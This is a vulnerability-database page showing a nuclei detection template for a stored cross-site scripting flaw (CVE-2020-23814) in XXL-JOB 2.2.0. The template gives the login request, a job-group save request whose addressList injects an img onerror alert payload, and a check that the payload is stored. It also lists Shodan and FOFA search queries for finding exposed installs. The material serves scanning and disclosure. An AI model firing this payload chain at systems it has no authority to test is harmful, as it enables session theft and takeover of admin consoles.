Lucene search
K

XXL-JOB v2.2.0 — Stored Cross Site Scripting

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

XXL-JOB v2.2.0 has stored XSS flaws allowing remote injection via AppName and AddressList in JobGroupController.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-23814
15 Sep 202509:10
circl
CNVD
xxl-job cross-site scripting vulnerability
4 Sep 202000:00
cnvd
CVE
CVE-2020-23814
3 Sep 202016:58
cve
Cvelist
CVE-2020-23814
3 Sep 202016:58
cvelist
EUVD
EUVD-2022-4808
3 Oct 202520:07
euvd
Github Security Blog
xxl-job Multiple cross-site scripting (XSS) vulnerabilities
24 May 202217:27
github
NVD
CVE-2020-23814
3 Sep 202017:15
nvd
OSV
GHSA-PQQJ-299W-WF53 xxl-job Multiple cross-site scripting (XSS) vulnerabilities
24 May 202217:27
osv
Prion
Cross site scripting
3 Sep 202017:15
prion
Positive Technologies
PT-2020-15584
3 Sep 202000:00
ptsecurity
Rows per page
id: CVE-2020-23814

info:
  name: XXL-JOB v2.2.0 — Stored Cross Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the AppName and AddressList parameters, potentially stealing admin session cookies or performing administrative actions on behalf of authenticated users.
  remediation: |
    Upgrade to XXL-JOB version 2.2.1 or later.
  reference:
    - https://github.com/xuxueli/xxl-job/issues/1866
    - https://www.ccsq8.com/issues.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-23814
    cwe-id: CWE-79
    epss-score: 0.01188
    epss-percentile: 0.64137
    cpe: cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: xuxueli
    product: xxl-job
    shodan-query:
      - http.html:"/xxl-job-admin/static/favicon.ico"
      - http.favicon.hash:"1691956220"
    fofa-query:
      - app="xxl-job"
      - icon_hash=1691956220
  tags: cve,cve2020,xxl-job,xss,authenticated,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "{{username}}"
  password: "{{password}}"
  title: "{{to_lower(rand_base(6))}}"

http:
  - raw:
      - |
        POST /xxl-job-admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{RootURL}}
        Referer: {{RootURL}}/xxl-job-admin/toLogin
        X-Requested-With: XMLHttpRequest

        userName={{username}}&password={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"code\":200")'
        condition: and
        internal: true

  - raw:
      - |
        GET /xxl-job-admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<b>XXL-JOB</b> 2.2.0")'
        condition: and
        internal: true

  - raw:
      - |
        POST /xxl-job-admin/jobgroup/save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{RootURL}}
        Referer: {{RootURL}}/xxl-job-admin/jobgroup
        X-Requested-With: XMLHttpRequest

        appname={{title}}&title={{title}}&addressType=1&addressList=<img src=# onerror=\"alert(document.domain)\" />

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"code\":200")'
        condition: and
        internal: true

  - raw:
      - |
        POST /xxl-job-admin/jobgroup/pageList HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{RootURL}}
        Referer: {{RootURL}}/xxl-job-admin/jobgroup
        X-Requested-With: XMLHttpRequest

        start=0&length=100

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "{{title}}","alert(document.domain)")'
        condition: and
# digest: 4b0a00483046022100a8f3cd96b234e2f870523e0c464806cc06bb85cf553c2e3c4cf13435d086182f022100de7ff861db8b91d0ad420c0823305738247f1b93e5578ce38ecbfe41032f1949:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.01188
25